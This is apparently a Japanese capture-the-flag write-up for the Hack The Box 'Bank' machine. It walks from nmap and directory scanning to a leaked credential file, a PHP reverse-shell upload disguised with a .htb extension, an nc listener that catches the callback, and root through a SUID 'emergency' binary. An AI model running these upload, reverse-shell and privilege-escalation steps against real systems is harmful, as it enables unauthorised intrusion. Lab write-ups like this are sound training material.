HTB Bank
ポート探索
nmap
$ nmap -sCV -A -v -Pn -p- --min-rate 5000 10.10.10.29 -oN nmap_result.txt
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
| 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
| 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_ 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.7 (Ubuntu)画面
feroxbuster
$ feroxbuster -u http://bank.htb/ -d 2 -C 403,404,500 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
302 GET 188l 319w 7322c http://bank.htb/ => login.php
301 GET 9l 28w 301c http://bank.htb/inc => http://bank.htb/inc/
200 GET 0l 0w 0c http://bank.htb/inc/user.php
302 GET 0l 0w 0c http://bank.htb/inc/header.php => login.php
200 GET 0l 0w 0c http://bank.htb/inc/ticket.php
200 GET 23l 38w 622c http://bank.htb/inc/footer.php
[####################] - 15m 207629/207629 230/s http://bank.htb/uploads/
[####################] - 1s 207629/207629 253206/s http://bank.htb/assets/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 1s 207629/207629 340375/s http://bank.htb/inc/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 9s 207629/207629 22221/s http://bank.htb/balance-transfer/ => Directory listing (add --scan-dir-listings to scan) credentials
balance-transfer/を確認
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+
===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===Webアプリへログイン
HTMLファイルを見るとDebug用に拡張子を.htbにするとphpファイルをアップロード可能とのこと
kaliではデフォルトでphpのリバースシェルが用意されているので拡張子をhtbに変更してサポートフォームからアップロードする
└─$ ls /usr/share/webshells/php
findsocket php-backdoor.php php-reverse-shell.php qsd-php-backdoor.php simple-backdoor.phpリバースシェルの実行
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.29] 41536
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
02:28:45 up 50 min, 0 users, load average: 0.24, 0.28, 0.14
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
Privilege Escalation
$ find / -perm -u=s -type f 2>/dev/null
/var/htb/bin/emergency
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/bin/ping
/bin/ping6
/bin/su
/bin/fusermount
/bin/mount
/bin/umount$ /var/htb/bin/emergency
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)